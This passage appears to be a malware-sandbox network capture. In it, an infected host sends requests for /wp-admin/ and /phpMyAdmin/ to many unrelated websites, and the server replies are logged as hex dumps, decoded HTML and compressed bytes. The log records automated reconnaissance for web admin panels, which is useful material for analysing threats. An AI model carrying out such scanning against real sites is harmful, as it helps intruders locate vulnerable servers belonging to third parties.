                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.441776037 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.535450935 CET266OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://eremina.net/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.751840115 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.751847982 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                119192.168.2.65636066.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.574281931 CET234OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.711997032 CET1148INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                120192.168.2.65639464.71.33.3180
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.574496031 CET225OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.711986065 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                121192.168.2.65638985.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.589627028 CET223OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.803319931 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=odoh50iolpgpw2ifmkzbamho; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.803402901 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.803411007 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.803423882 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.006051064 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.006057024 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                122192.168.2.656345188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.590028048 CET226OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.797508955 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
